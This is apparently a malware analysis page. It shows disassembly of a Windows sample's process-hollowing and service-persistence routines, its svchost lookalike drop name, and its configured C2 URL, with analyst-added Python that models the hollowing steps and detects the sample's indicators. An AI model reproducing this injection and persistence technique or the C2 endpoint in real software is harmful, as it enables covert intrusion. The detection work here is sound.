0041431D mov eax, dword ptr [edx+50h]
00414320 push eax
00414321 mov ecx, dword ptr [ebp-5Ch]
00414324 push ecx
00414325 mov edx, dword ptr [ebp-10h]
00414328 push edx
00414329 call 004144F0h
0041432E push 00000000h
00414330 mov eax, dword ptr [ebp-64h]
00414333 mov ecx, dword ptr [eax+54h]
00414336 push ecx
00414337 mov edx, dword ptr [ebp-68h]
0041433A push edx
0041433B mov eax, dword ptr [ebp-5Ch]
0041433E push eax
0041433F mov ecx, dword ptr [ebp-10h]
00414342 push ecx
00414343 call 00414520h
00414348 mov dword ptr [ebp-00000348h], 00000000h
00414352 jmp 00414363h
00414354 mov edx, dword ptr [ebp-00000348h] xrefs 004143B9
0041435A add edx, 01h
0041435D mov dword ptr [ebp-00000348h], edx
00414363 mov eax, dword ptr [ebp-64h] xrefs 00414352
00414366 movzx ecx, word ptr [eax+06h]
0041436A cmp dword ptr [ebp-00000348h], ecx
00414370 jnl 004143BBh
00414372 mov edx, dword ptr [ebp-00000344h]
00414378 mov eax, dword ptr [edx+3Ch]
0041437B mov ecx, dword ptr [ebp-68h]
0041437E lea edx, dword ptr [ecx+eax+000000F8h]
00414385 mov eax, dword ptr [ebp-00000348h]
0041438B imul eax, eax, 28h
0041438E add edx, eax
00414390 mov dword ptr [ebp-60h], edx
00414393 push 00000000h
00414395 mov ecx, dword ptr [ebp-60h]
00414398 mov edx, dword ptr [ecx+10h]
0041439B push edx
0041439C mov eax, dword ptr [ebp-60h]
0041439F mov ecx, dword ptr [ebp-68h]
004143A2 add ecx, dword ptr [eax+14h]
004143A5 push ecx
004143A6 mov edx, dword ptr [ebp-60h]
004143A9 mov eax, dword ptr [ebp-5Ch]
004143AC add eax, dword ptr [edx+0Ch]
004143AF push eax
004143B0 mov ecx, dword ptr [ebp-10h]
004143B3 push ecx
004143B4 call 00414520h
004143B9 jmp 00414354h
004143BB mov dword ptr [ebp-00000340h], 00010002h xrefs 00414370
004143C5 lea edx, dword ptr [ebp-00000340h]
004143CB push edx
004143CC mov eax, dword ptr [ebp-0Ch]
004143CF push eax
004143D0 call 00414450h
004143D5 push 00000000h
004143D7 push 00000004h
004143D9 lea ecx, dword ptr [ebp-5Ch]
004143DC push ecx
004143DD mov edx, dword ptr [ebp-0000029Ch]
004143E3 add edx, 08h
004143E6 push edx
004143E7 mov eax, dword ptr [ebp-10h]
004143EA push eax
004143EB call 00414520h
004143F0 mov ecx, dword ptr [ebp-5Ch]
004143F3 add ecx, dword ptr [ebp-6Ch]
004143F6 mov dword ptr [ebp-00000290h], ecx
004143FC lea edx, dword ptr [ebp-00000340h]
00414402 push edx
00414403 mov eax, dword ptr [ebp-0Ch]
00414406 push eax
00414407 call 00414550h
0041440C mov ecx, dword ptr [ebp-0Ch]
0041440F push ecx
00414410 call 00414570h
00414415 mov edx, dword ptr [ebp-68h]
00414418 push edx
00414419 call 00413F70h
0041441E push FFFFFFFFh
00414420 mov eax, dword ptr [ebp-10h]
00414423 push eax
00414424 call 00414590h
00414429 mov esp, ebp
0041442B pop ebp
0041442C ret function end
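The function above is a process-hollowing routine. Reading the listing: from the payload buffer ([ebp+0Ch]) it takes e_lfanew ([ecx+3Ch]), ImageBase (+34h), AddressOfEntryPoint (+28h), SizeOfImage (+50h) and SizeOfHeaders (+54h); it unmaps the target's image at that ImageBase with NtUnmapViewOfSection; VirtualAllocEx is called with 0x3000 (MEM_COMMIT | MEM_RESERVE) and protection 4 (PAGE_READWRITE) for SizeOfImage bytes; the headers and then every section (VirtualAddress +0Ch, SizeOfRawData +10h, PointerToRawData +14h, with the section table taken at e_lfanew+0F8h, i.e. a 0xE0-byte optional header is assumed) are copied with WriteProcessMemory; the thread CONTEXT at ebp-340h is fetched with ContextFlags = 0x10002 (CONTEXT_INTEGER); ImageBase is written over PEB.ImageBaseAddress (CONTEXT.Ebx + 8, the ebp-29Ch slot) and CONTEXT.Eax (ebp-290h) is set to ImageBase + AddressOfEntryPoint before SetThreadContext and ResumeThread. The Python below is an added example for this page, not the sample's or the sandbox's code: it performs the same header walk on a constructed PE and returns the operations the routine would issue, so an analyst can predict the memory layout of the hollowed process from a recovered payload. The wrapper 00414450 is assumed to be GetThreadContext (it receives the thread handle and the CONTEXT right after ContextFlags is set; the API is not in the resolved list above), and build_sample_pe is a constructed input.

```python
import struct

# x86 CONTEXT offsets behind the stack slots in the listing (ebp-0x340 is the CONTEXT):
# ebp-0x29C = CONTEXT+0xA4 = Ebx, which holds the PEB address of a freshly created
# suspended thread; ebp-0x290 = CONTEXT+0xB0 = Eax, its start address.
CONTEXT_INTEGER = 0x10002
CONTEXT_EBX, CONTEXT_EAX = 0xA4, 0xB0
PEB_IMAGE_BASE_ADDRESS = 0x8
MEM_COMMIT_RESERVE, PAGE_READWRITE = 0x3000, 0x04


class PEError(ValueError):
    pass


def _u16(b, off):
    return struct.unpack_from("<H", b, off)[0]


def _u32(b, off):
    return struct.unpack_from("<I", b, off)[0]


def plan_hollow(image: bytes) -> dict:
    """Walk the payload headers as the listed routine does and return the
    remote-process operations it would issue, in order."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise PEError("missing DOS header")
    nt = _u32(image, 0x3C)                                   # [ecx+3Ch]  e_lfanew
    if nt + 0xF8 > len(image) or image[nt:nt + 4] != b"PE\0\0":
        raise PEError("missing PE header")
    num_sections    = _u16(image, nt + 0x06)                 # [eax+06h]  NumberOfSections
    entry_rva       = _u32(image, nt + 0x28)                 # [edx+28h]  AddressOfEntryPoint
    image_base      = _u32(image, nt + 0x34)                 # [eax+34h]  ImageBase
    size_of_image   = _u32(image, nt + 0x50)                 # [edx+50h]  SizeOfImage
    size_of_headers = _u32(image, nt + 0x54)                 # [eax+54h]  SizeOfHeaders
    if size_of_headers > len(image):
        raise PEError("SizeOfHeaders exceeds buffer")        # the routine itself does not check

    ops = [("NtUnmapViewOfSection", image_base),
           ("VirtualAllocEx", image_base, size_of_image, MEM_COMMIT_RESERVE, PAGE_READWRITE)]
    writes = [(image_base, 0, size_of_headers)]              # (remote address, buffer offset, size)
    for i in range(num_sections):
        # section table at e_lfanew+0xF8: a 0xE0-byte optional header is assumed,
        # SizeOfOptionalHeader is never read
        sec = nt + 0xF8 + i * 0x28
        if sec + 0x28 > len(image):
            raise PEError("section table exceeds buffer")
        virt_addr, raw_size, raw_ptr = struct.unpack_from("<III", image, sec + 0x0C)
        if raw_ptr + raw_size > len(image):
            raise PEError("section %d raw data exceeds buffer" % i)   # also unchecked in the routine
        writes.append((image_base + virt_addr, raw_ptr, raw_size))
    ops += [("WriteProcessMemory",) + w for w in writes]
    ops += [("GetThreadContext", CONTEXT_INTEGER),            # wrapper 00414450, inferred
            ("WriteProcessMemory", "PEB(Ebx)+%#x" % PEB_IMAGE_BASE_ADDRESS, image_base, 4),
            ("SetThreadContext", "Eax", image_base + entry_rva),
            ("ResumeThread",)]
    return {"image_base": image_base, "size_of_image": size_of_image,
            "entry_point": image_base + entry_rva, "writes": writes, "ops": ops}


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image with two sections (not from the report)."""
    nt = 0x80
    img = bytearray(0x500)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, nt)
    img[nt:nt + 4] = b"PE\0\0"
    struct.pack_into("<HH", img, nt + 0x04, 0x14C, 2)        # Machine=i386, NumberOfSections=2
    struct.pack_into("<H", img, nt + 0x14, 0xE0)             # SizeOfOptionalHeader
    struct.pack_into("<H", img, nt + 0x18, 0x10B)            # PE32 magic
    struct.pack_into("<I", img, nt + 0x28, 0x1000)           # AddressOfEntryPoint
    struct.pack_into("<I", img, nt + 0x34, 0x400000)         # ImageBase
    struct.pack_into("<I", img, nt + 0x50, 0x3000)           # SizeOfImage
    struct.pack_into("<I", img, nt + 0x54, 0x200)            # SizeOfHeaders
    sec = nt + 0xF8
    img[sec:sec + 8] = b".text\0\0\0"                        # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<IIII", img, sec + 8, 0x200, 0x1000, 0x200, 0x200)
    sec += 0x28
    img[sec:sec + 8] = b".data\0\0\0"
    struct.pack_into("<IIII", img, sec + 8, 0x100, 0x2000, 0x100, 0x400)
    img[0x200:0x400] = b"\xCC" * 0x200                       # placeholder code bytes
    return bytes(img)
```

Two things worth noting from the plan: the protection pushed for VirtualAllocEx is PAGE_READWRITE (4), not PAGE_EXECUTE_READWRITE (0x40), so if the target runs with DEP enforced the resumed thread faults at the entry point; and because the original image is unmapped and replaced by a private allocation at ImageBase, the hollowed process shows a main-module region whose type is MEM_PRIVATE rather than MEM_IMAGE and whose headers no longer match the file on disk, which is the usual memory-forensics tell for this technique.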
APIs
  • HeapAlloc.KERNEL32, ref: 00415FFE
Address Instruction Meta Information
00415FF2 push dword ptr [esp+04h] xrefs 004145B9, 0041624E
00415FF6 push 00000000h
00415FF8 push dword ptr [00418CE0h]
00415FFE call dword ptr [00401000h] HeapAlloc@KERNEL32.DLL (Import)
00416004 ret function end
APIs
  • GetProcessHeap.KERNEL32, ref: 004161F3
Address Instruction Meta Information
004161F3 call dword ptr [00401018h] GetProcessHeap@KERNEL32.DLL (Import)
004161F9 xor ecx, ecx
004161FB test eax, eax
004161FD sete cl
00416200 mov dword ptr [00418CE0h], eax
00416205 mov eax, ecx
00416207 ret function end
Address Instruction Meta Information
004145F0 push ebp xrefs 00414675
004145F1 mov ebp, esp
004145F3 push ecx
004145F4 mov eax, dword ptr [ebp+0Ch]
004145F7 push eax
004145F8 call 004145B0h
004145FD add esp, 04h
00414600 mov dword ptr [ebp-04h], eax
00414603 mov ecx, dword ptr [ebp+08h]
00414606 push ecx
00414607 mov edx, dword ptr [ebp-04h]
0041460A push edx
0041460B call 00416005h
00414610 add esp, 08h
00414613 push 00000004h
00414615 push 00000000h
00414617 mov eax, dword ptr [ebp-04h]
0041461A push eax
0041461B call 00414A00h
00414620 mov esp, ebp
00414622 pop ebp
00414623 ret function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • FindClose.KERNEL32, ref: 00414216
Address Instruction Meta Information
00414200 push ebp xrefs 00413EC5
00414201 mov ebp, esp
00414203 mov eax, dword ptr [ebp+08h]
00414206 push eax
00414207 push 6B5366BEh
0041420C push 7B4842C1h
00414211 call 00415E40h
00414216 call eax FindClose@KERNEL32.DLL (Hidden Import)
00414218 pop ebp
00414219 retn 0004h function end
Executed Functions
APIs
  • getaddrinfo.WS2_32, ref: 00413BEF
  • getaddrinfo.WS2_32, ref: 00413C32
  • getaddrinfo.WS2_32, ref: 00413C6B
  • getaddrinfo.WS2_32, ref: 00413C8E
  • FreeAddrInfoW.WS2_32, ref: 00413CCD
Strings
  • 0.0.0.0, va: 00413CF0
  • ::0, va: 00413D00
  • 127.0.0.1, va: 00413D0C
  • ::1, va: 00413D20
Address Instruction Meta Information
00413B90 push ebp xrefs 00413EC7, 00413EF5
00413B91 mov ebp, esp
00413B93 add esp, FFFFFFD8h
00413B96 push ebx
00413B97 push esi
00413B98 push edi
00413B99 mov esi, ecx
00413B9B lea edi, dword ptr [ebp-28h]
00413B9E mov ecx, 00000008h
00413BA3 rep movsd
00413BA5 mov edi, edx
00413BA7 mov ebx, eax
00413BA9 mov esi, dword ptr [ebp+08h]
00413BAC xor eax, eax
00413BAE mov dword ptr [ebp-08h], eax
00413BB1 xor eax, eax
00413BB3 push ebp
00413BB4 push 00413CD4h
00413BB9 push dword ptr fs:[eax]
00413BBC mov dword ptr fs:[eax], esp
00413BBF mov eax, esi
00413BC1 xor ecx, ecx
00413BC3 mov edx, 0000001Ch
00413BC8 call 00403030h
00413BCD cmp dword ptr [ebp-20h], 03h
00413BD1 jne 00413BFDh
00413BD3 xor eax, eax
00413BD5 mov dword ptr [ebp-20h], eax
00413BD8 xor eax, eax
00413BDA mov dword ptr [ebp-1Ch], eax
00413BDD lea eax, dword ptr [ebp-08h]
00413BE0 push eax
00413BE1 lea eax, dword ptr [ebp-28h]
00413BE4 push eax
00413BE5 push 00000000h
00413BE7 mov eax, ebx
00413BE9 call 00404878h
00413BEE push eax
00413BEF call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413BF5 mov dword ptr [ebp-04h], eax
00413BF8 jmp 00413C97h
00413BFD mov eax, ebx xrefs 00413BD1
00413BFF mov edx, 00413CF0h ASCII "0.0.0.0"
00413C04 call 004047C4h
00413C09 je 00413C19h
00413C0B mov eax, ebx
00413C0D mov edx, 00413D00h ASCII "::0"
00413C12 call 004047C4h
00413C17 jne 00413C3Dh
00413C19 mov dword ptr [ebp-28h], 00000001h xrefs 00413C09
00413C20 lea eax, dword ptr [ebp-08h]
00413C23 push eax
00413C24 lea eax, dword ptr [ebp-28h]
00413C27 push eax
00413C28 mov eax, edi
00413C2A call 00404878h
00413C2F push eax
00413C30 push 00000000h
00413C32 call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413C38 mov dword ptr [ebp-04h], eax
00413C3B jmp 00413C97h
00413C3D mov eax, ebx xrefs 00413C17
00413C3F mov edx, 00413D0Ch ASCII "127.0.0.1"
00413C44 call 004047C4h
00413C49 je 00413C59h
00413C4B mov eax, ebx
00413C4D mov edx, 00413D20h ASCII "::1"
00413C52 call 004047C4h
00413C57 jne 00413C76h
00413C59 lea eax, dword ptr [ebp-08h] xrefs 00413C49
00413C5C push eax
00413C5D lea eax, dword ptr [ebp-28h]
00413C60 push eax
00413C61 mov eax, edi
00413C63 call 00404878h
00413C68 push eax
00413C69 push 00000000h
00413C6B call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413C71 mov dword ptr [ebp-04h], eax
00413C74 jmp 00413C97h
00413C76 lea eax, dword ptr [ebp-08h] xrefs 00413C57
00413C79 push eax
00413C7A lea eax, dword ptr [ebp-28h]
00413C7D push eax
00413C7E mov eax, edi
00413C80 call 00404878h
00413C85 push eax
00413C86 mov eax, ebx
00413C88 call 00404878h
00413C8D push eax
00413C8E call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413C94 mov dword ptr [ebp-04h], eax
00413C97 cmp dword ptr [ebp-04h], 00000000h xrefs 00413C3B, 00413C74, 00413BF8
00413C9B jne 00413CB6h
00413C9D cmp dword ptr [ebp-08h], 00000000h
00413CA1 je 00413CB6h
00413CA3 mov eax, dword ptr [ebp-08h]
00413CA6 mov ecx, dword ptr [eax+10h]
00413CA9 mov edx, esi
00413CAB mov eax, dword ptr [ebp-08h]
00413CAE mov eax, dword ptr [eax+18h]
00413CB1 call 00402890h
00413CB6 xor eax, eax xrefs 00413C9B, 00413CA1
00413CB8 pop edx
00413CBA pop ecx Count = 2
00413CBB mov dword ptr fs:[eax], edx
00413CBE push 00413CDBh
00413CC3 cmp dword ptr [ebp-08h], 00000000h xrefs 00413CD9
00413CC7 je 00413CD3h
00413CC9 mov eax, dword ptr [ebp-08h]
00413CCC push eax
00413CCD call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00413CD3 ret xrefs 00413CC7 function end
APIs
    • GetModuleHandleA.KERNEL32, ref: 00406044
    • QueryPerformanceCounter.KERNEL32, ref: 00402A20
    • GetTickCount.KERNEL32, ref: 00402A34
    • SHGetSpecialFolderPathA.SHELL32, ref: 00421CEF
    • GetCommandLineA.KERNEL32, ref: 004029F2
    • OpenSCManagerA.ADVAPI32, ref: 00429AC4
    • CreateServiceA.ADVAPI32, ref: 00429AF5
    • CloseServiceHandle.ADVAPI32, ref: 00429AFD
    • OpenServiceA.ADVAPI32, ref: 00429B39
    • StartServiceA.ADVAPI32, ref: 00429B4D
    • QueryServiceStatus.ADVAPI32, ref: 00429B5C
  • CopyFileA.KERNEL32, ref: 00429EBB
  • StartServiceCtrlDispatcherA.ADVAPI32, ref: 00429F02
Strings
  • Host Generic Process, va: 00429F38
  • Host Generic Process for Win32 Services, va: 00429F74
  • \svchst.exe, va: 00429FB0
  • http://mahaajan.in/dd/diwar.php, va: 0042A000
Address Instruction Meta Information
00429D88 push ebp
00429D89 mov ebp, esp
00429D8B mov ecx, 00000005h
00429D92 push 00000000h Count = 2
00429D94 dec ecx
00429D95 jne 00429D90h
00429D97 push ecx
00429D98 push ebx
00429D99 mov eax, 00429CC0h
00429D9E call 00406038h
00429DA3 xor eax, eax
00429DA5 push ebp
00429DA6 push 00429F22h
00429DAB push dword ptr fs:[eax]
00429DAE mov dword ptr fs:[eax], esp
00429DB1 call 00402A1Ch
00429DB6 mov eax, 0042DA9Ch
00429DBB mov edx, 00429F38h ASCII "Host Generic Process"
00429DC0 call 00404430h
00429DC5 mov eax, 0042DAA0h
00429DCA mov edx, 00429F74h ASCII "Host Generic Process for Win32 Services"
00429DCF call 00404430h
00429DD4 mov eax, 0042DAA4h
00429DD9 mov edx, 00429FB0h ASCII "\svchst.exe"
00429DDE call 00404430h
00429DE3 mov eax, 0042DA88h
00429DE8 mov edx, 0042A000h ASCII "http://mahaajan.in/dd/diwar.php"
00429DED call 00404430h
00429DF2 lea edx, dword ptr [ebp-14h]
00429DF5 mov eax, dword ptr [0042DA9Ch] 009610D0
00429DFA call 00429BACh
00429DFF mov edx, dword ptr [ebp-14h]
00429E02 mov eax, 0042DA9Ch
00429E07 call 00404430h
00429E0C lea edx, dword ptr [ebp-18h]
00429E0F mov eax, dword ptr [0042DAA0h] 00961190
00429E14 call 00429BACh
00429E19 mov edx, dword ptr [ebp-18h]
00429E1C mov eax, 0042DAA0h
00429E21 call 00404430h
00429E26 lea edx, dword ptr [ebp-1Ch]
00429E29 mov eax, dword ptr [0042DAA4h] 00961D84
00429E2E call 00429BACh
00429E33 mov edx, dword ptr [ebp-1Ch]
00429E36 mov eax, 0042DAA4h
00429E3B call 00404430h
00429E40 mov eax, dword ptr [0042DA88h] 00961DD8
00429E45 call 00404878h
00429E4A mov edx, eax
00429E4C lea eax, dword ptr [ebp-24h]
00429E4F call 004045D4h
00429E54 mov eax, dword ptr [ebp-24h]
00429E57 lea edx, dword ptr [ebp-20h]
00429E5A call 00429BACh
00429E5F mov edx, dword ptr [ebp-20h]
00429E62 mov eax, 0042DA88h
00429E67 call 00404430h
00429E6C lea edx, dword ptr [ebp-28h]
00429E6F mov ax, 0024h
00429E73 call 00421CB8h
00429E78 mov edx, dword ptr [ebp-28h]
00429E7B mov eax, 0042DAA8h
00429E80 mov ecx, dword ptr [0042DAA4h] 00961D84
00429E86 call 004046C4h
00429E8B mov eax, dword ptr [0042DAA8h] 00961F30
00429E90 call 00407978h
00429E95 test al, al
00429E97 jne 00429EE4h
00429E99 push FFFFFFFFh
00429E9B mov eax, dword ptr [0042DAA8h] 00961F30
00429EA0 call 00404878h
00429EA5 mov ebx, eax
00429EA7 push ebx
00429EA8 lea edx, dword ptr [ebp-2Ch]
00429EAB xor eax, eax
00429EAD call 004029BCh
00429EB2 mov eax, dword ptr [ebp-2Ch]
00429EB5 call 00404878h
00429EBA push eax
00429EBB call 004060FCh CopyFileA@KERNEL32.DLL (Hidden Import)
00429EC0 mov eax, dword ptr [0042DA9Ch] 009610D0
00429EC5 call 00404878h
00429ECA push eax
00429ECB mov eax, ebx
00429ECD pop edx
00429ECE call 00429AB4h
00429ED3 mov eax, dword ptr [0042DA9Ch] 009610D0
00429ED8 call 00404878h
00429EDD call 00429B14h
00429EE2 jmp 00429F07h
00429EE4 mov eax, dword ptr [0042DA9Ch] 009610D0 xrefs 00429E97
00429EE9 call 00404878h
00429EEE mov dword ptr [0042CA98h], eax
00429EF3 mov dword ptr [0042CA9Ch], 00429A0Ch
00429EFD push 0042CA98h
00429F02 call 00421B7Ch StartServiceCtrlDispatcherA@ADVAPI32.DLL (Hidden Import)
00429F07 xor eax, eax xrefs 00429EE2
00429F09 pop edx
00429F0B pop ecx Count = 2
00429F0C mov dword ptr fs:[eax], edx
00429F0F push 00429F29h
00429F14 lea eax, dword ptr [ebp-2Ch] xrefs 00429F27
00429F17 mov edx, 00000007h
00429F1C call 00404400h
00429F21 ret function end
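The entry routine above sets up persistence. It builds a path from SHGetSpecialFolderPathA with CSIDL 0x24 (CSIDL_WINDOWS) plus "\svchst.exe", one letter short of svchost.exe; if that file is already present (the check at 00407978, presumably a file-exists test built on the FindFirstFileA helper at 00407910), it runs as the service through StartServiceCtrlDispatcherA, otherwise it copies itself there with CopyFileA and uses the listed OpenSCManagerA/CreateServiceA/StartServiceA chain to register and start a service named "Host Generic Process" with display name "Host Generic Process for Win32 Services". The configured endpoint is http://mahaajan.in/dd/diwar.php. The Python below is an added detection example written for this page, not code from the sample or the sandbox: it scores constructed service-install and HTTP records against these indicators, and generalises the dropped-file indicator to any svchost.exe lookalike (edit distance 1) whose image lives outside the system directories; the record format and SAMPLE_EVENTS are assumptions of the example.

```python
import ntpath
import re

# indicators taken from the strings and API sequence listed above
SERVICE_NAME    = "Host Generic Process"
SERVICE_DISPLAY = "Host Generic Process for Win32 Services"
DROP_BASENAME   = "svchst.exe"                     # written into the CSIDL_WINDOWS (0x24) folder
C2_URL          = "http://mahaajan.in/dd/diwar.php"
SYSTEM_DIRS     = (r"c:\windows\system32", r"c:\windows\syswow64")


def within_one_edit(a: str, b: str) -> bool:
    """Levenshtein distance <= 1; catches svchst.exe / svchosts.exe style lookalikes."""
    if a == b:
        return True
    if abs(len(a) - len(b)) > 1:
        return False
    i = 0
    while i < min(len(a), len(b)) and a[i] == b[i]:
        i += 1
    if len(a) == len(b):
        return a[i + 1:] == b[i + 1:]          # one substitution
    if len(a) > len(b):
        return a[i + 1:] == b[i:]              # one extra character in a
    return a[i:] == b[i + 1:]                  # one missing character in a


def _image_file(image_path: str) -> str:
    """Strip quoting and service arguments ('... svchost.exe -k netsvcs') down to the .exe path."""
    m = re.match(r'\s*"?(.*?\.exe)\b', image_path, re.IGNORECASE)
    return (m.group(1) if m else image_path).strip().lower()


def suspicious_service(name: str, display: str, image_path: str) -> list:
    """Reasons a service-install record matches the behaviour in the listing."""
    reasons = []
    if name == SERVICE_NAME or display == SERVICE_DISPLAY:
        reasons.append("service name/display string used by this sample")
    directory, base = ntpath.split(_image_file(image_path))
    if base == DROP_BASENAME:
        reasons.append("service binary is the dropped svchst.exe")
    if within_one_edit(base, "svchost.exe") and not directory.startswith(SYSTEM_DIRS):
        reasons.append("svchost.exe lookalike outside the system directories: " + image_path)
    return reasons


def suspicious_url(url: str) -> list:
    return ["C2 URL used by this sample"] if url.strip().lower() == C2_URL else []


def triage(events: list) -> list:
    """Return (event index, reason) pairs for every record that matches."""
    hits = []
    for idx, ev in enumerate(events):
        if ev.get("type") == "service_install":
            reasons = suspicious_service(ev["name"], ev["display"], ev["image_path"])
        elif ev.get("type") == "http_post":
            reasons = suspicious_url(ev["url"])
        else:
            reasons = []
        hits += [(idx, r) for r in reasons]
    return hits


SAMPLE_EVENTS = [                                   # constructed records, not sandbox output
    {"type": "service_install", "name": "Host Generic Process",
     "display": "Host Generic Process for Win32 Services", "image_path": r"C:\WINDOWS\svchst.exe"},
    {"type": "service_install", "name": "wuauserv", "display": "Automatic Updates",
     "image_path": r"C:\WINDOWS\System32\svchost.exe -k netsvcs"},
    {"type": "http_post", "url": "http://mahaajan.in/dd/diwar.php"},
    {"type": "http_post", "url": "http://www.example.com/"},
]
```

The lookalike rule is deliberately path-aware: a genuine svchost.exe under System32 or SysWOW64 with service arguments must not fire, which is why the image path is reduced to the executable before the directory test.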
APIs
  • VirtualAlloc.KERNEL32, ref: 0040154F
Address Instruction Meta Information
00401520 push ebx xrefs 00401824
00401521 push esi
00401522 push edi
00401523 mov ebx, edx
00401525 mov esi, eax
00401527 cmp esi, 00100000h
0040152D jnl 00401536h
0040152F mov esi, 00100000h
00401534 jmp 00401542h
00401536 add esi, 0000FFFFh xrefs 0040152D
0040153C and esi, FFFF0000h
00401542 mov dword ptr [ebx+04h], esi xrefs 00401534
00401545 push 00000001h
00401547 push 00002000h
0040154C push esi
0040154D push 00000000h
0040154F call 0040134Ch VirtualAlloc@KERNEL32.DLL (Import)
00401554 mov edi, eax
00401556 mov dword ptr [ebx], edi
00401558 test edi, edi
0040155A je 0040157Fh
0040155C mov edx, ebx
0040155E mov eax, 0042C5E4h
00401563 call 004013D4h
00401568 test al, al
0040156A jne 0040157Fh
0040156C push 00008000h
00401571 push 00000000h
00401573 mov eax, dword ptr [ebx]
00401575 push eax
00401576 call 00401354h
0040157B xor eax, eax
0040157D mov dword ptr [ebx], eax
0040157F pop edi xrefs 0040155A, 0040156A
00401580 pop esi
00401581 pop ebx
00401582 ret function end
APIs
  • GetLocaleInfoA.KERNEL32, ref: 0040A12A
Address Instruction Meta Information
0040A10C push ebp xrefs 0040A19C, 0040A3BB, 0040A482, 0040B80A, 0040B82C, 0040B850, 0040B89A, 0040B8D1, 0040B8FE, 0040B93E, 0040B960, 0040B992, 0040B9D1, 0040B9F4
0040A10D mov ebp, esp
0040A10F add esp, FFFFFF00h
0040A115 push ebx
0040A116 push esi
0040A117 mov esi, ecx
0040A119 mov ebx, dword ptr [ebp+08h]
0040A11C push 00000100h
0040A121 lea ecx, dword ptr [ebp-00000100h]
0040A127 push ecx
0040A128 push edx
0040A129 push eax
0040A12A call 004061BCh GetLocaleInfoA@KERNEL32.DLL (Hidden Import)
0040A12F test eax, eax
0040A131 jle 0040A145h
0040A133 mov ecx, eax
0040A135 dec ecx
0040A136 lea edx, dword ptr [ebp-00000100h]
0040A13C mov eax, ebx
0040A13E call 004044CCh
0040A143 jmp 0040A14Eh
0040A145 mov eax, ebx xrefs 0040A131
0040A147 mov edx, esi
0040A149 call 00404430h
0040A14E pop esi xrefs 0040A143
0040A14F pop ebx
0040A150 mov esp, ebp
0040A152 pop ebp
0040A153 retn 0004h function end
Address Instruction Meta Information
0040137C push ebx xrefs 004013DA
0040137D push esi
0040137E mov esi, 0042C5E0h
00401383 cmp dword ptr [esi], 00000000h
00401386 jne 004013C2h
00401388 push 00000644h
0040138D push 00000000h
0040138F call 0040133Ch
00401394 mov ecx, eax
00401396 test ecx, ecx
00401398 jne 0040139Fh
0040139A xor eax, eax
0040139C pop esi
0040139D pop ebx
0040139E ret function end
0040139F mov eax, dword ptr [0042C5DCh] 00148BC8 xrefs 00401398
004013A4 mov dword ptr [ecx], eax
004013A6 mov dword ptr [0042C5DCh], ecx
004013AC xor edx, edx
004013AE mov eax, edx xrefs 004013C0
004013B0 add eax, eax
004013B2 lea eax, dword ptr [ecx+eax*8+04h]
004013B6 mov ebx, dword ptr [esi]
004013B8 mov dword ptr [eax], ebx
004013BA mov dword ptr [esi], eax
004013BC inc edx
004013BD cmp edx, 64h
004013C0 jne 004013AEh
004013C2 mov eax, dword ptr [esi] xrefs 00401386
004013C4 mov edx, dword ptr [eax]
004013C6 mov dword ptr [esi], edx
004013C8 pop esi
004013C9 pop ebx
004013CA ret function end
APIs
  • SHGetSpecialFolderPathA.SHELL32, ref: 00421CEF
Address Instruction Meta Information
00421CB8 push ebp xrefs 00421E40, 00422267, 00422017, 00429E73
00421CB9 mov ebp, esp
00421CBB push 00000000h
00421CBD push ebx
00421CBE push esi
00421CBF mov esi, edx
00421CC1 mov ebx, eax
00421CC3 xor eax, eax
00421CC5 push ebp
00421CC6 push 00421D27h
00421CCB push dword ptr fs:[eax]
00421CCE mov dword ptr fs:[eax], esp
00421CD1 lea eax, dword ptr [ebp-04h]
00421CD4 mov edx, 00000104h
00421CD9 call 004049A8h
00421CDE push 00000001h
00421CE0 movzx eax, bx
00421CE3 push eax
00421CE4 mov eax, dword ptr [ebp-04h]
00421CE7 call 00404878h
00421CEC push eax
00421CED push 00000000h
00421CEF call 00421B94h SHGetSpecialFolderPathA@SHELL32.DLL (Import)
00421CF4 test al, al
00421CF6 jne 00421D00h
00421CF8 lea eax, dword ptr [ebp-04h]
00421CFB call 004043DCh
00421D00 mov eax, dword ptr [ebp-04h] xrefs 00421CF6
00421D03 call 00404878h
00421D08 mov edx, eax
00421D0A mov eax, esi
00421D0C call 004045D4h
00421D11 xor eax, eax
00421D13 pop edx
00421D15 pop ecx Count = 2
00421D16 mov dword ptr fs:[eax], edx
00421D19 push 00421D2Eh
00421D1E lea eax, dword ptr [ebp-04h] xrefs 00421D2C
00421D21 call 004043DCh
00421D26 ret function end
APIs
  • FindFirstFileA.KERNEL32, ref: 0040792B
  • FindClose.KERNEL32, ref: 00407936
  • FileTimeToLocalFileTime.KERNEL32, ref: 0040794F
  • FileTimeToDosDateTime.KERNEL32, ref: 00407960
Address Instruction Meta Information
00407910 push ebp xrefs 0040797D
00407911 mov ebp, esp
00407913 add esp, FFFFFEB4h
00407919 push ebx
0040791A mov ebx, eax
0040791C lea eax, dword ptr [ebp-0000014Ch]
00407922 push eax
00407923 mov eax, ebx
00407925 call 00404878h
0040792A push eax
0040792B call 00406144h FindFirstFileA@KERNEL32.DLL (Hidden Import)
00407930 cmp eax, FFFFFFFFh
00407933 je 00407969h
00407935 push eax
00407936 call 0040613Ch FindClose@KERNEL32.DLL (Hidden Import)
0040793B test byte ptr [ebp-0000014Ch], 00000010h
00407942 jne 00407969h
00407944 lea eax, dword ptr [ebp-0Ch]
00407947 push eax
00407948 lea eax, dword ptr [ebp-00000138h]
0040794E push eax
0040794F call 00406134h FileTimeToLocalFileTime@KERNEL32.DLL (Hidden Import)
00407954 lea eax, dword ptr [ebp-04h]
00407957 push eax
00407958 lea eax, dword ptr [ebp-02h]
0040795B push eax
0040795C lea eax, dword ptr [ebp-0Ch]
0040795F push eax
00407960 call 0040612Ch FileTimeToDosDateTime@KERNEL32.DLL (Hidden Import)
00407965 test eax, eax
00407967 jne 00407970h
00407969 mov dword ptr [ebp-04h], FFFFFFFFh xrefs 00407933, 00407942
